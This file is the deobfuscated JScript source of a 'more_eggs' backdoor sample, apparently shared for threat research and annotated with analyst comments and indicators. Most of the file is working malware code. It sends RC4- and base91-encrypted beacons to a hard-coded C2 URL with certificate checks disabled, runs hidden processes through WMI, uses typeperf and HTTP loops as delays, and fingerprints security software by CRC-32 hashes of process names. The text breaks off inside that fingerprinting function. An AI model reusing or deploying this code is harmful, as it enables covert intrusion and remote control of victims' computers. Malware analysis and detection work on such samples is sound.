///////////////////////////////////////////////////////////////////////////////////////
////////////////////////// more_eggs sample ///////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
/////// source: https://twitter.com/VK_Intel/status/1286747453849468929 ///////////////
///////////////////////////////////////////////////////////////////////////////////////
function anonymous() {
// Hard-coded configuration and shared state of the sample. Useful as static indicators.
var BV = "6.6a"; // version string; sent as the last field of the beacon built by bot_header()
var Gate = "https://maps.doaglas.com/update/check"; // C2 endpoint (network IoC) used by check_Host() and eTask()
var hit_each = 10;
var error_retry = 2;
var restart_h = 4;
var rcon_max = hit_each * (restart_h * 60) / (hit_each * hit_each); // evaluates to 24 with the values above
var Rkey = "whVbBSXoQHLa9sfFVZ"; // static key prefix; a 2-character nonce is appended per message (check_Host/hit_Gate)
var rcon_now = 0;
var gtfo = false;
var selfdel = false;
var table = []; // CRC-32 lookup table, filled by crc32_init()
var Build = ""; // set as a side effect of os_version_no_cmd()
var PCN = ""; // sent in the beacon after remove_non_ascii(); presumably the computer name - confirm where it is set
var UNM = ""; // sent in the beacon after remove_non_ascii(); presumably the user name - confirm where it is set
var SYSTEM = 0; // when 1, check_Host/hit_Gate always use the ServerXMLHTTP object
var rootK = "HKCU"; // registry root used to build key paths in eTask()
var workingDir = "";
var main_mitm = "";
var xApp = ""; // directory prefix for payloads dropped by dExec()
var xTmp = ""; // path prefix for temporary output files (cAV, local_ip2, rev_cmd, os_version_no_cmd)
var PreserveH = ""; // prefix of the task reply sent back by eTask()
var xStore = ""; // registry value path read in eTask()
var set = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!#$%&()*+,./:;<=>?@[]^_`{|}~"'; // 91-character alphabet for base91_encode/base91_decode
var b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; // base64 alphabet; index 64 ('=') is the padding character
// Thin wrapper: every COM object in the sample is created through this one call,
// so all ProgIDs used appear as string arguments to obj() elsewhere in the file.
function obj(xString) {
return new ActiveXObject(xString);
}
// Two HTTP clients are created up front and shared by all network functions.
// con: client-side XMLHTTP, trying progressively older ProgIDs.
var con;
try {
con = obj("Msxml2.XMLHTTP.6.0");
} catch (e) {
try {
con = obj("Msxml2.XMLHTTP.3.0");
} catch (e2) {
con = obj("Microsoft.XMLHTTP");
}
}
// xhr: ServerXMLHTTP, used as the fallback transport (method === 1) and whenever SYSTEM === 1.
// No catch around the 3.0 attempt: if both ProgIDs fail the exception propagates.
var xhr;
try {
xhr = obj("Msxml2.ServerXMLHTTP.6.0");
} catch (e3) {
xhr = obj("Msxml2.ServerXMLHTTP.3.0");
}
// Connectivity check: fetches a fixed W3C URL and compares the body with a known string.
// method 0 uses con (XMLHTTP), method 1 uses xhr (ServerXMLHTTP); a failure with
// method 0 is retried once with method 1.
// Returns true only when the response is HTTP 200 with the exact expected body.
// Analyst note: a plain-HTTP GET for this namespace URL from a script host is unusual
// and can serve as a network indicator.
function check_Net(method) {
var Resp = false;
var conz1;
var t11 = "";
if (method === 1) {
conz1 = xhr;
} else {
conz1 = con;
}
try {
// third argument false = synchronous request
conz1.open("GET", "http://www.w3.org/1999/XSL/Format", false);
} catch (e1) {
if (method === 0) {
return check_Net(1);
} else {
return false;
}
}
conz1.onreadystatechange = function() {
if (conz1.readyState === 4) {
if (conz1.status === 200) {
t11 = conz1.responseText;
if (t11) {
if (t11 == 'This is another XSL namespace\n') {
Resp = true;
} else {
Resp = false;
}
} else {
Resp = false;
}
} else {
Resp = false;
}
}
};
try {
conz1.send();
} catch (e2) {
if (method === 0) {
return check_Net(1);
} else {
return false;
}
}
return Resp;
}
// Length check: true when min <= mstr.length <= max, false for an empty string.
// Any other length falls off the end and returns undefined, which is why callers
// compare the result with === true.
function cLength(mstr, min, max) {
var n = mstr.length;
if (n === 0) {
return false;
}
if (n >= min && (n <= max)) {
return true;
}
}
// Random integer in [min, max], both inclusive, from Math.random (not a CSPRNG).
function rInt(min, max) {
min = Math.ceil(min);
max = Math.floor(max);
return Math.floor(Math.random() * (max - min + 1)) + min;
}
// Random alphanumeric string of length len, built from Math.random.
// The do/while always runs once, so len <= 0 still yields one character.
// Used for the per-message key nonce and for random padding in C2 messages.
function rStr(len) {
var xRnd = "";
var i;
var randomPoz;
var charSet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
var clen = 62;
i = 0;
do {
randomPoz = Math.floor(Math.random() * clen);
xRnd += charSet.substring(randomPoz, randomPoz + 1);
i += 1;
} while (i < len);
return xRnd;
}
// Issues a synchronous GET to http://8.8.8.8/<2-16 random characters> with
// timeouts of 5 s (resolve/connect) and 10 s (send/receive).
// The response is never read; waitfor()/waitfor2() call this in a loop until a
// deadline passes, so it acts as the body of a delay loop.
// Returns false on exception, undefined otherwise.
// Analyst note: repeated HTTP requests to 8.8.8.8 on port 80 with random paths are
// a network-level indicator of this delay loop.
function fuck_js() {
var xNow = rInt(2, 16);
var rNow = rStr(xNow);
try {
xhr.setTimeouts(5000, 5000, 10000, 10000);
xhr.open("GET", "http://8.8.8.8/" + rNow, false);
xhr.send();
} catch (e9) {
return false;
}
}
// Returns true when the file at xpath exists (Scripting.FileSystemObject),
// false when it does not or when the COM call throws.
function fexist(xpath) {
var fso;
try {
fso = obj("Scripting.FileSystemObject");
if (fso.FileExists(xpath)) {
return true;
} else {
return false;
}
} catch (feer) {
return false;
}
}
// Registry existence test: true when RegRead(xpath) returns a non-null value,
// false when RegRead throws. A null read falls through and returns undefined.
function rexist(xpath) {
var sh;
var rdata;
try {
sh = obj("Wscript.shell");
rdata = sh.RegRead(xpath);
if (rdata !== null) {
return true;
}
} catch (e71) {
return false;
}
}
// Reads environment variable xVar through WScript.Shell: from the SYSTEM
// environment when xSystem === 1, otherwise from the PROCESS environment.
// No error handling: COM failures propagate to the caller.
function myEnv(xVar, xSystem) {
var a1;
var rEnv;
a1 = obj("WScript.Shell");
if (xSystem === 1) {
rEnv = a1.environment("SYSTEM");
} else {
rEnv = a1.environment("PROCESS");
}
return rEnv(xVar);
}
// Returns "64" when the SYSTEM-level PROCESSOR_ARCHITECTURE is "AMD64", else "86".
// The SYSTEM environment is read, so the result reflects the OS rather than the
// bitness of the script host process.
function myBits() {
var xBits;
xBits = myEnv("PROCESSOR_ARCHITECTURE", 1);
if (xBits === "AMD64") {
return "64";
} else {
return "86";
}
}
// String cipher: the loops below match the RC4 key schedule and keystream
// generator, XORed character by character with str. Symmetric, so the same call
// encrypts and decrypts. Returns "" when key or str is empty.
// Used for C2 traffic with key = Rkey + 2-character nonce (check_Host, hit_Gate).
function zzzz4(key, str) {
var s = [];
var j = 0;
var x;
var res = "";
var i;
var y;
if (key && str) {
// identity permutation 0..255
i = 0;
do {
s[i] = i;
i += 1;
} while (i < 256);
// key scheduling: mix the key into the permutation
i = 0;
do {
j = (j + s[i] + key.charCodeAt(i % key.length)) % 256;
x = s[i];
s[i] = s[j];
s[j] = x;
i += 1;
} while (i < 256);
// keystream generation, one output character per input character
i = 0;
j = 0;
y = 0;
do {
i = (i + 1) % 256;
j = (j + s[i]) % 256;
x = s[i];
s[i] = s[j];
s[j] = x;
res += String.fromCharCode(str.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]);
y += 1;
} while (y < str.length);
}
return res;
}
// Byte-array variant of zzzz4 (same RC4-style schedule and keystream).
// Note the argument order is reversed: data first, key second.
// Returns an array of numbers; [] when key or xArray is falsy.
// dExec() uses it to decrypt downloaded payloads with a per-task key.
function zzz4Bytes(xArray, key) {
var s = [];
var j = 0;
var x;
var outBytes = [];
var i;
var y;
if (key && xArray) {
i = 0;
do {
s[i] = i;
i += 1;
} while (i < 256);
i = 0;
do {
j = (j + s[i] + key.charCodeAt(i % key.length)) % 256;
x = s[i];
s[i] = s[j];
s[j] = x;
i += 1;
} while (i < 256);
i = 0;
j = 0;
y = 0;
do {
i = (i + 1) % 256;
j = (j + s[i]) % 256;
x = s[i];
s[i] = s[j];
s[j] = x;
outBytes.push(xArray[y] ^ s[(s[i] + s[j]) % 256]);
y += 1;
} while (y < xArray.length);
}
return outBytes;
}
// "To bytes": converts a string into an array of byte values.
// Code units below 128 pass through; others are looked up in y, which maps a
// Unicode code point to a byte 0x80..0xFF. The table is the inverse of the one in
// tS() and is consistent with code page 437, the Charset dExec() sets on its
// ADODB.Stream. Code units missing from y produce undefined entries.
function tB(htc) {
var y = [];
y[0xC7] = 0x80;
y[0xFC] = 0x81;
y[0xE9] = 0x82;
y[0xE2] = 0x83;
y[0xE4] = 0x84;
y[0xE0] = 0x85;
y[0xE5] = 0x86;
y[0xE7] = 0x87;
y[0xEA] = 0x88;
y[0xEB] = 0x89;
y[0xE8] = 0x8A;
y[0xEF] = 0x8B;
y[0xEE] = 0x8C;
y[0xEC] = 0x8D;
y[0xC4] = 0x8E;
y[0xC5] = 0x8F;
y[0xC9] = 0x90;
y[0xE6] = 0x91;
y[0xC6] = 0x92;
y[0xF4] = 0x93;
y[0xF6] = 0x94;
y[0xF2] = 0x95;
y[0xFB] = 0x96;
y[0xF9] = 0x97;
y[0xFF] = 0x98;
y[0xD6] = 0x99;
y[0xDC] = 0x9A;
y[0xA2] = 0x9B;
y[0xA3] = 0x9C;
y[0xA5] = 0x9D;
y[0x20A7] = 0x9E;
y[0x192] = 0x9F;
y[0xE1] = 0xA0;
y[0xED] = 0xA1;
y[0xF3] = 0xA2;
y[0xFA] = 0xA3;
y[0xF1] = 0xA4;
y[0xD1] = 0xA5;
y[0xAA] = 0xA6;
y[0xBA] = 0xA7;
y[0xBF] = 0xA8;
y[0x2310] = 0xA9;
y[0xAC] = 0xAA;
y[0xBD] = 0xAB;
y[0xBC] = 0xAC;
y[0xA1] = 0xAD;
y[0xAB] = 0xAE;
y[0xBB] = 0xAF;
y[0x2591] = 0xB0;
y[0x2592] = 0xB1;
y[0x2593] = 0xB2;
y[0x2502] = 0xB3;
y[0x2524] = 0xB4;
y[0x2561] = 0xB5;
y[0x2562] = 0xB6;
y[0x2556] = 0xB7;
y[0x2555] = 0xB8;
y[0x2563] = 0xB9;
y[0x2551] = 0xBA;
y[0x2557] = 0xBB;
y[0x255D] = 0xBC;
y[0x255C] = 0xBD;
y[0x255B] = 0xBE;
y[0x2510] = 0xBF;
y[0x2514] = 0xC0;
y[0x2534] = 0xC1;
y[0x252C] = 0xC2;
y[0x251C] = 0xC3;
y[0x2500] = 0xC4;
y[0x253C] = 0xC5;
y[0x255E] = 0xC6;
y[0x255F] = 0xC7;
y[0x255A] = 0xC8;
y[0x2554] = 0xC9;
y[0x2569] = 0xCA;
y[0x2566] = 0xCB;
y[0x2560] = 0xCC;
y[0x2550] = 0xCD;
y[0x256C] = 0xCE;
y[0x2567] = 0xCF;
y[0x2568] = 0xD0;
y[0x2564] = 0xD1;
y[0x2565] = 0xD2;
y[0x2559] = 0xD3;
y[0x2558] = 0xD4;
y[0x2552] = 0xD5;
y[0x2553] = 0xD6;
y[0x256B] = 0xD7;
y[0x256A] = 0xD8;
y[0x2518] = 0xD9;
y[0x250C] = 0xDA;
y[0x2588] = 0xDB;
y[0x2584] = 0xDC;
y[0x258C] = 0xDD;
y[0x2590] = 0xDE;
y[0x2580] = 0xDF;
y[0x3B1] = 0xE0;
y[0xDF] = 0xE1;
y[0x393] = 0xE2;
y[0x3C0] = 0xE3;
y[0x3A3] = 0xE4;
y[0x3C3] = 0xE5;
y[0xB5] = 0xE6;
y[0x3C4] = 0xE7;
y[0x3A6] = 0xE8;
y[0x398] = 0xE9;
y[0x3A9] = 0xEA;
y[0x3B4] = 0xEB;
y[0x221E] = 0xEC;
y[0x3C6] = 0xED;
y[0x3B5] = 0xEE;
y[0x2229] = 0xEF;
y[0x2261] = 0xF0;
y[0xB1] = 0xF1;
y[0x2265] = 0xF2;
y[0x2264] = 0xF3;
y[0x2320] = 0xF4;
y[0x2321] = 0xF5;
y[0xF7] = 0xF6;
y[0x2248] = 0xF7;
y[0xB0] = 0xF8;
y[0x2219] = 0xF9;
y[0xB7] = 0xFA;
y[0x221A] = 0xFB;
y[0x207F] = 0xFC;
y[0xB2] = 0xFD;
y[0x25A0] = 0xFE;
y[0xA0] = 0xFF;
var ami = [];
var mi;
var renderer;
var atends;
// do/while: runs once even for an empty string, which pushes a single undefined
mi = 0;
do {
renderer = htc.charCodeAt(mi);
if (renderer < 128) {
atends = renderer;
} else {
atends = y[renderer];
}
ami.push(atends);
mi += 1;
} while (mi < htc.length);
return ami;
}
// "To string": inverse of tB(). Converts an array of byte values into a string.
// Bytes below 128 pass through; bytes 0x80..0xFF are mapped through x to the
// Unicode code point that the same table in tB() maps back to that byte.
// dExec() uses the result with ADODB.Stream.WriteText under Charset 437 so the
// stream writes the original bytes to disk.
function tS(arenderer) {
var x = [];
x[0x80] = 0x00C7;
x[0x81] = 0x00FC;
x[0x82] = 0x00E9;
x[0x83] = 0x00E2;
x[0x84] = 0x00E4;
x[0x85] = 0x00E0;
x[0x86] = 0x00E5;
x[0x87] = 0x00E7;
x[0x88] = 0x00EA;
x[0x89] = 0x00EB;
x[0x8A] = 0x00E8;
x[0x8B] = 0x00EF;
x[0x8C] = 0x00EE;
x[0x8D] = 0x00EC;
x[0x8E] = 0x00C4;
x[0x8F] = 0x00C5;
x[0x90] = 0x00C9;
x[0x91] = 0x00E6;
x[0x92] = 0x00C6;
x[0x93] = 0x00F4;
x[0x94] = 0x00F6;
x[0x95] = 0x00F2;
x[0x96] = 0x00FB;
x[0x97] = 0x00F9;
x[0x98] = 0x00FF;
x[0x99] = 0x00D6;
x[0x9A] = 0x00DC;
x[0x9B] = 0x00A2;
x[0x9C] = 0x00A3;
x[0x9D] = 0x00A5;
x[0x9E] = 0x20A7;
x[0x9F] = 0x0192;
x[0xA0] = 0x00E1;
x[0xA1] = 0x00ED;
x[0xA2] = 0x00F3;
x[0xA3] = 0x00FA;
x[0xA4] = 0x00F1;
x[0xA5] = 0x00D1;
x[0xA6] = 0x00AA;
x[0xA7] = 0x00BA;
x[0xA8] = 0x00BF;
x[0xA9] = 0x2310;
x[0xAA] = 0x00AC;
x[0xAB] = 0x00BD;
x[0xAC] = 0x00BC;
x[0xAD] = 0x00A1;
x[0xAE] = 0x00AB;
x[0xAF] = 0x00BB;
x[0xB0] = 0x2591;
x[0xB1] = 0x2592;
x[0xB2] = 0x2593;
x[0xB3] = 0x2502;
x[0xB4] = 0x2524;
x[0xB5] = 0x2561;
x[0xB6] = 0x2562;
x[0xB7] = 0x2556;
x[0xB8] = 0x2555;
x[0xB9] = 0x2563;
x[0xBA] = 0x2551;
x[0xBB] = 0x2557;
x[0xBC] = 0x255D;
x[0xBD] = 0x255C;
x[0xBE] = 0x255B;
x[0xBF] = 0x2510;
x[0xC0] = 0x2514;
x[0xC1] = 0x2534;
x[0xC2] = 0x252C;
x[0xC3] = 0x251C;
x[0xC4] = 0x2500;
x[0xC5] = 0x253C;
x[0xC6] = 0x255E;
x[0xC7] = 0x255F;
x[0xC8] = 0x255A;
x[0xC9] = 0x2554;
x[0xCA] = 0x2569;
x[0xCB] = 0x2566;
x[0xCC] = 0x2560;
x[0xCD] = 0x2550;
x[0xCE] = 0x256C;
x[0xCF] = 0x2567;
x[0xD0] = 0x2568;
x[0xD1] = 0x2564;
x[0xD2] = 0x2565;
x[0xD3] = 0x2559;
x[0xD4] = 0x2558;
x[0xD5] = 0x2552;
x[0xD6] = 0x2553;
x[0xD7] = 0x256B;
x[0xD8] = 0x256A;
x[0xD9] = 0x2518;
x[0xDA] = 0x250C;
x[0xDB] = 0x2588;
x[0xDC] = 0x2584;
x[0xDD] = 0x258C;
x[0xDE] = 0x2590;
x[0xDF] = 0x2580;
x[0xE0] = 0x03B1;
x[0xE1] = 0x00DF;
x[0xE2] = 0x0393;
x[0xE3] = 0x03C0;
x[0xE4] = 0x03A3;
x[0xE5] = 0x03C3;
x[0xE6] = 0x00B5;
x[0xE7] = 0x03C4;
x[0xE8] = 0x03A6;
x[0xE9] = 0x0398;
x[0xEA] = 0x03A9;
x[0xEB] = 0x03B4;
x[0xEC] = 0x221E;
x[0xED] = 0x03C6;
x[0xEE] = 0x03B5;
x[0xEF] = 0x2229;
x[0xF0] = 0x2261;
x[0xF1] = 0x00B1;
x[0xF2] = 0x2265;
x[0xF3] = 0x2264;
x[0xF4] = 0x2320;
x[0xF5] = 0x2321;
x[0xF6] = 0x00F7;
x[0xF7] = 0x2248;
x[0xF8] = 0x00B0;
x[0xF9] = 0x2219;
x[0xFA] = 0x00B7;
x[0xFB] = 0x221A;
x[0xFC] = 0x207F;
x[0xFD] = 0x00B2;
x[0xFE] = 0x25A0;
x[0xFF] = 0x00A0;
var bb = [];
var leppek = "";
var atends;
var renderer;
var mi;
// characters are collected in an array and joined once at the end
mi = 0;
do {
atends = arenderer[mi];
if (atends < 128) {
renderer = atends;
} else {
renderer = x[atends];
}
bb.push(String.fromCharCode(renderer));
mi += 1;
} while (mi < arenderer.length);
leppek = bb.join("");
return leppek;
}
// Returns true when the byte array starts with 0x4D 0x5A ("MZ"), the magic at the
// start of DOS/PE executables. dExec() uses it to confirm that the decrypted
// download is an executable image (i.e. that the task key was right).
function mZcheck(arenderer) {
if (arenderer[0] === 0x4D && arenderer[1] === 0x5a) {
return true;
} else {
return false;
}
}
// Random integer in 0..65535; used as the numeric base name of dropped/temp files.
function tempExtra() {
return Math.floor(Math.random() * 65536);
}
// Returns FileSystemObject.GetTempName(), or the fixed name "22222222.txt" when
// that call fails or returns nothing.
function randomTmp() {
var fso2;
var t1;
var xelse = "22222222.txt";
try {
fso2 = obj("Scripting.FileSystemObject");
t1 = fso2.GetTempName();
if (t1) {
return t1;
} else {
return xelse;
}
} catch (e0) {
return xelse;
}
}
// Produces a temp file name: "<0..65535>.txt" in the normal case. Only when
// tempExtra() returns 0 (falsy) does it fall back to randomTmp().
// Analyst note: files named <number>.txt under the xTmp/xApp prefixes are what
// the sample leaves on disk, including dropped executables (see dExec).
function tempNow() {
var xout = tempExtra();
if (!xout) {
xout = randomTmp();
} else {
xout += ".txt";
}
return xout;
}
// Deletes filespec if it exists. Returns false when the COM call throws and
// undefined otherwise; callers ignore the result.
function dFile(filespec) {
var fso;
try {
fso = obj("Scripting.FileSystemObject");
if (fso.FileExists(filespec)) {
fso.DeleteFile(filespec);
}
} catch (e8) {
return false;
}
}
// Resolves a shell special folder: Shell.Application.NameSpace(CSIDL).Self.Path.
// Returns the path string, or false when the namespace/item is null or a call throws.
function sFolder(CSIDL) {
var objFolder;
try {
var app = obj("Shell.Application");
objFolder = app.NameSpace(CSIDL);
if (objFolder !== null) {
var objFolderItem;
objFolderItem = objFolder.Self;
if (objFolderItem !== null) {
return objFolderItem.Path;
} else {
return false;
}
} else {
return false;
}
} catch (e1z0) {
return false;
}
}
// Encodes a string (one byte per character assumed) with a base-91 scheme over
// the 91-character alphabet in the outer variable `set`: bits are accumulated in
// b, and every 13 or 14 bits are emitted as two alphabet characters.
// Returns undefined for empty/falsy input.
// This is the outer encoding of every C2 request body (see check_Host, hit_Gate).
function base91_encode(data) {
if (data) {
var len = data.length;
var ret = "";
var n = 0;
var b = 0;
var v = 0;
var i = 0;
do {
b = b | data.charCodeAt(i) << n;
n = n + 8;
if (n > 13) {
// take 13 bits, or 14 when the 13-bit value is small enough to leave room
v = b & 8191;
if (v > 88) {
b = b >> 13;
n = n - 13;
} else {
v = b & 16383;
b = b >> 14;
n = n - 14;
}
ret += set.charAt(v % 91) + set.charAt(v / 91 | 0);
}
i = i + 1;
} while (i < len);
// flush remaining bits as one or two characters
if (n) {
ret += set.charAt(b % 91);
if (n > 7 || b > 90) {
ret += set.charAt(b / 91 | 0);
}
}
return ret;
}
}
// Inverse of base91_encode: consumes alphabet characters in pairs, rebuilds the
// 13/14-bit groups and emits bytes as characters. Characters not present in
// `set` are skipped. Returns undefined for empty/falsy input.
// hit_Gate() applies it to the C2 response before decrypting.
function base91_decode(data) {
if (data) {
var len = data.length;
var ret = "";
var b = 0;
var n = 0;
var v = -1;
var p;
var i = 0;
do {
p = set.indexOf(data.charAt(i));
if (p !== -1) {
if (v < 0) {
// first character of a pair
v = p;
} else {
// second character: complete the value and drain whole bytes
v = v + p * 91;
b = b | v << n;
if ((v & 8191) > 88) {
n = n + 13;
} else {
n = n + 14;
}
do {
ret += String.fromCharCode(b & 0xff);
b = b >> 8;
n = n - 8;
} while (n > 7);
v = -1;
}
}
i = i + 1;
} while (i < len);
// a trailing unpaired character contributes one final byte
if (v > -1) {
ret += String.fromCharCode((b | v << n) & 0xff);
}
return (ret);
}
}
// Base64 encoder over the outer alphabet `b64` (index 64 is '=' padding).
// Returns undefined for empty/falsy input.
// Quirk for anyone re-implementing a decoder: padding is decided by `!b` / `!c`,
// so a character with code 0 in the second or third position of a group is
// treated like a missing byte and encoded as padding.
function base64_encode(data) {
if (data) {
var result = '';
var i = 0;
var b1;
var b2;
var b3;
var b4;
var n = data.length;
var a;
var b;
var c;
do {
a = data.charCodeAt(i++);
b = data.charCodeAt(i++);
c = data.charCodeAt(i++);
// charCodeAt past the end yields NaN; normalise it to 0
a = a ? a : 0;
b = b ? b : 0;
c = c ? c : 0;
b1 = (a >> 2) & 0x3F;
b2 = ((a & 0x3) << 4) | ((b >> 4) & 0xF);
b3 = ((b & 0xF) << 2) | ((c >> 6) & 0x3);
b4 = c & 0x3F;
if (!b) {
b3 = 64;
b4 = 64;
} else if (!c) {
b4 = 64;
}
result = result + b64.charAt(b1) + b64.charAt(b2) + b64.charAt(b3) + b64.charAt(b4);
b1 = 0;
b2 = 0;
b3 = 0;
b4 = 0;
a = 0;
b = 0;
c = 0;
} while (i < n);
return result;
}
}
// Fallback launcher: runs sCom with WScript.Shell.Run, window style 0 (hidden),
// waiting for completion only when wait1 == 1.
// Returns true when Run was invoked without throwing, false otherwise; the exit
// code of the command is not inspected.
function cmd_command(sCom, wait1) {
var oShell;
var w11;
try {
oShell = obj("Wscript.Shell");
if (wait1 == 1) {
w11 = 1;
} else {
w11 = 0;
}
if (!w11) {
w11 = 0;
}
oShell.Run(sCom, 0, w11);
return true;
} catch (ec1) {
return false;
}
}
// Primary launcher: starts sCom through WMI (Win32_Process.Create on root\cimv2 of
// the local machine) with ShowWindow = 0. On a non-zero ReturnValue or any
// exception it falls back to cmd_command(sCom, wait).
// When wait == 1 it subscribes to process-deletion events (polling interval 1 s)
// and blocks until the event for the created PID arrives.
// Analyst note: processes created this way are children of the WMI provider host
// rather than of the script host, which breaks naive parent/child process chains;
// WMI activity logging and the command lines built by callers are the better
// detection anchors.
function wmi_command(sCom, wait) {
try {
var loc = obj("WbemScripting.SWbemLocator");
var svc = loc.ConnectServer(".", "root\\cimv2");
var objStartup = svc.Get("Win32_ProcessStartup").SpawnInstance_();
objStartup.ShowWindow = 0;
var objProcess = svc.Get("Win32_Process");
var objInParam = objProcess.Methods_("Create").inParameters.SpawnInstance_();
objInParam.Properties_.Item("CommandLine").Value = sCom;
objInParam.Properties_.Item("ProcessStartupInformation").Value = objStartup;
var objOutParams = svc.ExecMethod("Win32_Process", "Create", objInParam);
if (objOutParams.ReturnValue !== 0) {
return cmd_command(sCom, wait);
}
if (wait == 1) {
var cPid = objOutParams.ProcessId;
var eventObj;
// the subscription starts after Create returns; no timeout is applied to the loop
var eventSrc = svc.ExecNotificationQuery("SELECT * FROM __InstanceDeletionEvent Within 1 Where TargetInstance ISA 'Win32_Process'");
while (true) {
eventObj = eventSrc.nextEvent();
if (eventObj.TargetInstance.ProcessID == cPid) {
break;
}
}
}
return true;
} catch (ec1) {
return cmd_command(sCom, wait);
}
}
// Fallback delay: loops for sMinutes minutes, calling fuck_js() (an HTTP request
// to 8.8.8.8) on every iteration, then re-enters main() (defined outside this
// part of the file).
function waitfor(sMinutes) {
var limit = Date.parse(Date()) + (sMinutes * 60000);
while (Date.parse(Date()) < limit) {
fuck_js();
}
main();
}
// Preferred delay: launches typeperf.exe for a single sample (-sc 1) with the
// sample interval (-si) set to sMinutes * 60 seconds and waits for it to exit,
// which effectively sleeps for that long. Then calls main(); if the launch
// reports failure or throws, falls back to waitfor().
// Returns false immediately when sMinutes is falsy.
// Analyst note: typeperf.exe querying "\System\Processor Queue Length" with
// "-sc 1" and a large "-si", spawned via WMI, is a distinctive command line.
function wmi_waitfor(sMinutes) {
var ret88;
if (!sMinutes) {
return false;
}
var seconds = sMinutes * 60;
var sec2 = seconds.toString();
try {
ret88 = wmi_command('typeperf.exe "\\System\\Processor Queue Length" -si ' + sec2 + ' -sc 1', 1);
if (ret88 == true) {
main();
} else {
waitfor(sMinutes);
}
} catch (ewmi) {
return waitfor(sMinutes);
}
}
// Same delay loop as waitfor(), but afterwards calls go() (defined outside this
// part of the file) only when iGo === 1 instead of always calling main().
function waitfor2(sMinutes, iGo) {
var xlmt;
xlmt = Date.parse(Date()) + (sMinutes * 60000);
while (Date.parse(Date()) < xlmt) {
fuck_js();
}
if (iGo === 1) {
go();
}
}
// Same typeperf-based delay as wmi_waitfor(), but continues with go() only when
// iGo === 1; falls back to waitfor2() when the launch fails or throws.
// eTask() calls it as wmi_waitfor2(1, 0): a one-minute pause between download attempts.
function wmi_waitfor2(sMinutes, iGo) {
var ret88;
if (!sMinutes) {
return false;
}
var seconds = sMinutes * 60;
var sec2 = seconds.toString();
try {
ret88 = wmi_command('typeperf.exe "\\System\\Processor Queue Length" -si ' + sec2 + ' -sc 1', 1);
if (ret88 == true) {
if (iGo === 1) {
go();
}
} else {
waitfor2(sMinutes, iGo);
}
} catch (ewmi) {
return waitfor2(sMinutes, iGo);
}
}
// Strips every character outside printable ASCII (0x20-0x7E) from str.
// Returns "0" when the input is empty, conversion fails, or nothing is left.
// Applied to UNM and PCN before they are placed in the beacon.
function remove_non_ascii(str) {
var ret1 = "";
if ((!str) || (str === '')) {
return "0";
} else {
try {
str = str.toString();
ret1 = str.replace(/[^\x20-\x7E]/g, '');
} catch (un1) {
return "0";
}
}
if (!ret1) {
return "0";
} else {
return ret1;
}
}
// C2 liveness probe: POSTs an encrypted filler message to Gate and returns true
// when the reply is HTTP 200 with a body of 8 to 32 characters.
// Transport: xhr (ServerXMLHTTP) when SYSTEM === 1 or method === 1, else con;
// with SYSTEM === 0 a failure on method 0 is retried once with method 1.
// Wire format (same as hit_Gate): base91( RC4-style(Rkey + nonce, payload) + nonce ),
// where nonce is 2 random alphanumeric characters and the payload here is
// "|" + 8..32 random characters + "|".
function check_Host(method) {
var Resp = false;
var Temp90 = "";
var g11 = 0;
var conz1;
if (SYSTEM === 1) {
conz1 = xhr;
} else {
if (method === 1) {
conz1 = xhr;
} else {
conz1 = con;
}
}
try {
conz1.open("POST", Gate, false);
} catch (e3) {
if (SYSTEM === 0 && method === 0) {
return check_Host(1);
} else {
return false;
}
}
conz1.onreadystatechange = function() {
if (conz1.readyState === 4) {
if (conz1.status === 200) {
Temp90 = conz1.responseText;
if (Temp90) {
if (cLength(Temp90, 8, 32) === true) {
Resp = true;
}
}
}
}
};
var keynow = rStr(2);
var rNow = rInt(8, 32);
var not_unique = "|" + rStr(rNow) + "|";
var xCrypted = zzzz4(Rkey + keynow, not_unique) + keynow;
var encoded = base91_encode(xCrypted);
if (SYSTEM === 1 || method === 1) {
try {
// ServerXMLHTTP option 2 with value 13056 tells the client to ignore all server
// certificate errors, so the HTTPS connection to Gate is not authenticated.
conz1.setOption(2, 13056);
} catch (e411) {
g11 = 1; // set but never read in this function
}
}
try {
conz1.send(encoded);
} catch (e4) {
if (SYSTEM === 0 && method === 0) {
return check_Host(1);
} else {
return false;
}
}
return Resp;
}
// Fills the shared `table` with the 256-entry CRC-32 lookup table for the
// reflected polynomial 3988292384 (0xEDB88320). Must run before b_crc32().
function crc32_init() {
var i = 0;
var tmp = 0;
var k = 0;
while (i < 256) {
tmp = i;
k = 0;
while (k < 8) {
tmp = tmp & 1 ? 3988292384 ^ tmp >>> 1 : tmp >>> 1;
k += 1;
}
table[i] = tmp;
i += 1;
}
}
// Table-driven CRC-32 of str (one byte per character assumed), returned as an
// unsigned 32-bit number. Relies on `table` having been filled by crc32_init().
// cAV() compares these values against hard-coded constants, so the process names
// it looks for never appear in the sample as strings.
function b_crc32(str) {
var crc = -1;
var iTop = str.length;
var i = 0;
while (i < iTop) {
crc = (crc >>> 8) ^ table[(crc ^ str.charCodeAt(i)) & 0xFF];
i += 1;
}
return (crc ^ (-1)) >>> 0;
}
// Process-list fingerprinting. Collects the names of running processes, hashes
// each lower-cased name with CRC-32 and maps known hashes to short codes
// ("a".."z", "1".."5"). Returns the codes found as a comma-separated string, or
// "0" when nothing matched, fewer than 6 process names were obtained, fewer than 5
// hashes survived the skip list, or any step failed.
// The function and variable names suggest the targets are security products, but
// the sample contains only the hashes; recovering names requires hashing
// candidate process names with the same CRC-32.
// Collection paths:
//   1. WMI query "SELECT * FROM Win32_Process" (wInternal = 1).
//   2. On failure, a cmd.exe line that hides the tool name behind delayed
//      expansion of a randomly named variable set to "s"; after expansion it runs
//      tasklist /NH /FO CSV redirected to a temp file (wInternal = 0).
// Analyst note: "cmd /v /c set" followed by a command name split with !var!
// fragments is a stable command-line pattern for the fallback path.
function cAV() {
var pList = [];
var i = 0;
var rAV = "";
var ExeNow = "";
var fso;
var file4;
var vStr = "";
var tList = [];
var tL2 = [];
var rExe = "";
var x;
var pNow = "";
var cNow = 0;
var rFile = "";
var wInternal;
var itemNow;
// reporting codes; several hashes may share one code
var v1 = "a";
var v2 = "b";
var v3 = "c";
var v4 = "d";
var v5 = "e";
var v6 = "f";
var v7 = "g";
var v8 = "h";
var v9 = "i";
var v10 = "j";
var v11 = "k";
